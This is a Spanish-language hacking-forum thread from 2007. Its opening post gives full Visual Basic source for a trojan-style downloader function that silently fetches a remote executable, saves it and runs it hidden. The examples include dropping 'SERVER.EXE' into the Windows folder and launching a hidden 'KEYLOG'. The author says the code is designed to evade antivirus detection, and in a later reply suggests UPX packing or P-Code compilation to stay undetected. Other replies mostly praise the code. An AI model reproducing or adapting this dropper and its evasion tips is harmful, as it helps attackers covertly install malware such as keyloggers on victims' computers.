elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación General
| | |-+  .NET (C#, VB.NET, ASP)
| | | |-+  Programación Visual Basic (Moderadores: LeandroA, seba123neo)
| | | | |-+  [Source] Downloader sin API's sin DLL's sin OCX's... solo una Función!
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 Ir Abajo Respuesta Imprimir
Autor Tema: [Source] Downloader sin API's sin DLL's sin OCX's... solo una Función!  (Leído 8,691 veces)
Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
[Source] Downloader sin API's sin DLL's sin OCX's... solo una Función!
« en: 19 Mayo 2007, 01:29 am »

Hola, estoy programando el Cactus Downloader y publico aquí la función que implementaré en su núcleo. Permite descargar un fichero desde una dirección web HTTP o FTP, sin advertir al usuario. Funciona igual de bien que la famosa API: URLDownloadToFileA de urlmon.dll

El problema de esa API es que es detectada por el 99% de los Antivirus, por eso he diseñado una función flexible. Espero que sepais usar valores por defecto y valores opcionales, aunque no es demasiado complicado, aquí el source:

Module1.bas
Código
  1. ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
  2. 'Función que permite descargar un fichero de internet HTTP o FTP sin usar llamadas a APIS
  3. '
  4. 'Uso de la función:
  5. '   DownloadFile(URL = String, FileName = String, [SavePath = GlobalVar], [RunAfterDownload = Boolean], [RunHide = Boolean])
  6. '   Return Value = Boolean (indica si se ha descargado o no el archivo)
  7. '
  8. ''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''''
  9. Function DownloadFile(ByVal URL As String, ByVal SaveName As String, Optional SavePath As String = "TMP", Optional RunAfterDownload As Boolean = True, Optional RunHide As Boolean = False)
  10.    On Error Resume Next
  11.    Err.Clear
  12.  
  13.    Set XML = CreateObject("Microsoft.XMLHTTP")
  14.    Set ADS = CreateObject("ADODB.Stream")
  15.  
  16.    XML.Open "GET", URL, False
  17.    XML.send
  18.  
  19.    XML.getAllResponseHeaders
  20.  
  21.    FullSavePath = Environ(SavePath) & "\" & SaveName
  22.  
  23.    ADS.Open
  24.    ADS.Type = 1
  25.    ADS.Write XML.responseBody
  26.    ADS.SaveToFile FullSavePath, 2
  27.  
  28.    If Err Then
  29.        DownloadFile = False
  30.    Else
  31.        If RunAfterDownload = True Then
  32.            If RunHide = True Then
  33.                Shell FullSavePath, vbHide
  34.            Else
  35.                Shell FullSavePath, vbNormalFocus
  36.            End If
  37.        End If
  38.        DownloadFile = True
  39.    End If
  40. End Function
  41.  

Y para llamarla desde un Form o desde otra función:

Código
  1. Private Sub Command1_Click()
  2.    File = DownloadFile("http://perso.wanadoo.es/winworld/exec.exe", "prueba1.exe", "userprofile", True, False)
  3. End Sub
  4.  

El uso de la función es simple, y como usa valores Opcionales y Por Defecto solo tiene 2 argumentos requeridos, ejemplos:

DownloadFile("URL","NOMBRE")
Descargar el fichero URL y lo guarda en una carpeta Temporal con el nombre de NOMBRE, lo ejecuta y muestra la ventana

DownloadFile("URL","SERVER.EXE","SYSTEMROOT",FALSE)
Descargar el fichero URL y lo guarda en la capeta Windows con el nombre de SERVER.EXE, no lo ejecuta

DownloadFile("URL","KEYLOG",,,TRUE)
Descargar el fichero URL y lo guarda en una carpeta Temporal con el nombre de KEYLOG, lo ejecuta y NO muestra la ventana.

Si os complicais o no lo entendeis avisar, posteo un ejemplo (descargas válidad solo para usuarios registrados)


« Última modificación: 30 Junio 2007, 15:12 pm por ||MadAntrax|| » En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
3k1n0x


Desconectado Desconectado

Mensajes: 324



Ver Perfil
Re: [Source] Downloader sin API's sin DLL's sin OCX's... solo una Función!
« Respuesta #1 en: 19 Mayo 2007, 07:35 am »

wow tenia varios dias en el foro, me acabo de registrar y justo buscaba algo asi, muy buena  ;D saludos


En línea

T3fL0n -> 3k1n0x
Jareth


Desconectado Desconectado

Mensajes: 334



Ver Perfil
Re: [Source] Downloader sin API's sin DLL's sin OCX's... solo una Función!
« Respuesta #2 en: 19 Mayo 2007, 12:47 pm »

Que bueno ||MadAntrax||,deberian hacer una recopilacion de todos tus donaciones(que son muchas)y de otros users que tambien etsan posteando sources.
En línea

~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: [Source] Downloader sin API's sin DLL's sin OCX's... solo una Función!
« Respuesta #3 en: 19 Mayo 2007, 16:44 pm »

Muy weno la verdad, a ver si sale ya ese Cactus Donwloader ;)
En línea

sp26

Desconectado Desconectado

Mensajes: 88


Ver Perfil
Re: [Source] Downloader sin API's sin DLL's sin OCX's... solo una Función!
« Respuesta #4 en: 19 Mayo 2007, 19:08 pm »

Si te das cuenta, al guardar ese codigo en un Modulo BAS y lo guardas (No copilar), los antivirus lo detectan como Troyano.

Si quieres haz la prueba y subelo a VirusTotal.
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [Source] Downloader sin API's sin DLL's sin OCX's... solo una Función!
« Respuesta #5 en: 19 Mayo 2007, 19:24 pm »

Si te das cuenta, al guardar ese codigo en un Modulo BAS y lo guardas (No copilar), los antivirus lo detectan como Troyano.

Si quieres haz la prueba y subelo a VirusTotal.

Sí, es cierto ,esto ocurre porque los objectos Microsoft.XMLHTTP y ADODB.Stream pueden usarse en archivos VBScripting (como en VBS, VBE, HTML, etc...) permitiendo crear un downloader en texto plano, por eso algunos AntiVirus detectará en código fuente como "virus".

Pero no te preocupes por eso, si lo compilas (creas el EXE) los Antivirus por ahora no lo detectan, y siempre puedes terminar comprimiendo tu ejecutable en UPX o compilando a P-Code para dificultar su detección.

Saludos!!
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
~~
Ex-Staff
*
Desconectado Desconectado

Mensajes: 2.981


Ver Perfil WWW
Re: [Source] Downloader sin API's sin DLL's sin OCX's... solo una Función!
« Respuesta #6 en: 19 Mayo 2007, 19:27 pm »

Citar
Que bueno ||MadAntrax||,deberian hacer una recopilacion de todos tus donaciones(que son muchas)y de otros users que tambien etsan posteando sources.

Seria una wena idea q algun moderador global reopilara sus codigos, verdad ||MadAntrax||  :xD :xD :xD :xD
En línea

Mad Antrax
Colaborador
***
Desconectado Desconectado

Mensajes: 2.166


Cheats y Trainers para todos!


Ver Perfil WWW
Re: [Source] Downloader sin API's sin DLL's sin OCX's... solo una Función!
« Respuesta #7 en: 19 Mayo 2007, 19:31 pm »

Seria una wena idea q algun moderador global reopilara sus codigos, verdad ||MadAntrax||

Por una simple cuestión de igualdad, no creo que sea justo que se recopilen mis sources simplemente porque tenga el "poder" de hacerlo. Si algun usuario quiere mis sources solo tiene que usar el buscador y filtrar por mi usuario en el subforo de VB, no?

Saludos!!
En línea

No hago hacks/cheats para juegos Online.
Tampoco ayudo a nadie a realizar hacks/cheats para juegos Online.
Jareth


Desconectado Desconectado

Mensajes: 334



Ver Perfil
Re: [Source] Downloader sin API's sin DLL's sin OCX's... solo una Función!
« Respuesta #8 en: 19 Mayo 2007, 20:45 pm »

Bueno,yo lo que digo es que aparte de todos tus aportes hay mas usuarios qeu han aportado como E0N y seria bueno tener todos esos aportes recopilados.
Y lo que tu dices de buscar yo no lo veo asi,se puede buscar cuando se sabe lo que uno quiere pero imaginate que uno no sabe lo que es Melt,pero lo ve y ve que le puede interesar,pues asi con muchos aportes,que se estan perdiendo entre los posts.
Saludos.
En línea

vivachapas


Desconectado Desconectado

Mensajes: 612



Ver Perfil
Re: [Source] Downloader sin API's sin DLL's sin OCX's... solo una Función!
« Respuesta #9 en: 22 Mayo 2007, 02:54 am »

creo q seria muy interesante crear una "biblioteca de codes de VB"...

y q alguien se encargue de ver q codes entran... y por ejemplo q alguien quiere poner uno q antes sea revisado para ver si esta bien y si realmente es util...

;)

muy buen manual
En línea

Páginas: [1] 2 Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
[SOURCE] Letras3D7913 Funcion que crea letras 3D Flasheras
Programación Visual Basic
79137913 1 3,355 Último mensaje 26 Mayo 2011, 02:06 am
por Edu
[SOURCE] mrtzcmp3 Downloader « 1 2 »
.NET (C#, VB.NET, ASP)
z3nth10n 13 11,514 Último mensaje 8 Febrero 2014, 21:02 pm
por Eleкtro
[Source Code] autorun.inf.wim - Stealer&Downloader / No Requiere Privilegios / Propagacion USB
Análisis y Diseño de Malware
**Aincrad** 0 8,063 Último mensaje 10 Septiembre 2021, 02:18 am
por **Aincrad**
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines